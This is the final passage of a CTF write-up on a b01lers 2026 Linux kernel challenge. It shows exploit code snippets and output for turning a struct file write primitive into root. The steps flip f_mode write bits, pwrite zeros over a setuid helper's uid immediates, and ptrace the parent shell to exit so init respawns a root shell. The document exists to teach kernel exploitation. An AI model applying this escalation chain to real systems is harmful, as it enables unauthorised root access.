2 f_mode=0x004a801d f_flags=0x00008800 f_op=0xffffffff95c1acc0
From f_mode to a root shell
vfs_write() gates on the write bits in file->f_mode, and we have a write primitive into that exact struct file, so we OR them in through the straddle window:
1mode |= FMODE_WRITE | FMODE_PWRITE | FMODE_CAN_WRITE; // at buf[1 + 0x0c]
2mf_write(fake_store, fake, 0x1f, buf, 0x40);
The read-only fd we opened is now writable. /bin/drop_priv just setuid(1000)s and execs a shell, so we only need its two 1000 immediates to become 0. We find them by scanning the binary for the mov edi, 1000 ; call pattern (offsets 0x1514, 0x152f here) and pwrite zeros over them:
1patch_drop_priv_fd(target_fd, poff, npoff); // pwrite 0x00000000 over each 0x000003e8
Then the handoff. The initrd’s init is an infinite while true; do /bin/drop_priv; done, so we just need the current (uid 1000) shell to exit and the loop re-runs the patched binary. We ptrace the parent shell and rewrite its registers to exit_group(0), pointing rip at a syscall; ret in its vDSO:
1make_parent_exit_zero(); // ATTACH parent; rax=__NR_exit_group, rdi=0, rip=vdso syscall;ret
This needs no privileges, which surprised me at first. At this point we’re still uid 1000 and so is the parent shell, and same-uid ptrace is unprivileged — you only need CAP_SYS_PTRACE to attach across a privilege boundary. On top of that this kernel ships without Yama (CONFIG_SECURITY_YAMA is unset), so there’s no ptrace_scope to forbid attaching to an ancestor. If it ever did fail, poking exit into the tty with TIOCSTI or just killing the shell would do the same job.
No kernel payload, no commit_creds, no KASLR-dependent symbol — just a patched suid-like helper. init respawns the shell through the patched drop_priv, and it comes up root:
1[~] root
2[+] A=0xffff9de3419c2000 B=0xffff9de3419c3000
3[+] drop_priv patch offsets: 0x1514 0x152f
4[+] B reclaimed as /bin/drop_priv struct file after 188 opens
5[+] flipped FMODE_WRITE on the read-only struct file
6 patch[0] off=0x1514 old=0x000003e8
7 patch[1] off=0x152f old=0x000003e8
8[+] patched /bin/drop_priv
9[+] forced parent shell exit(0) -> init respawns a root shell
10/home/ctf # id
11uid=0(root) gid=0(root) groups=0(root)
That’s the whole chain: a base-vs-bounds OOB inside one hardened SLUB cache, turned into a heap leak, a freelist forge, a page-straddling fake object, a cross-cache reclaim, and finally a userland binary patch — bctf{:3} never needed.
Full source code can be found here.
Conclusion
That wraps up both kernel challenges from b01lers 2026. Multifiles was my favorite of the two. Hope it was a useful read.
References
- Part 1: throughthewall — the firewall UAF, and the same
/bin/drop_privpatch finale from a different write primitive. - KSPP study — protecting heap metadata: how
SLAB_FREELIST_HARDENEDworks. - duasynt — Linux kernel heap feng shui in 2022
- sam4k — exploring Linux’s random kmalloc caches
- Dirty Pagetable
- r1ru — Linux kernel exploitation series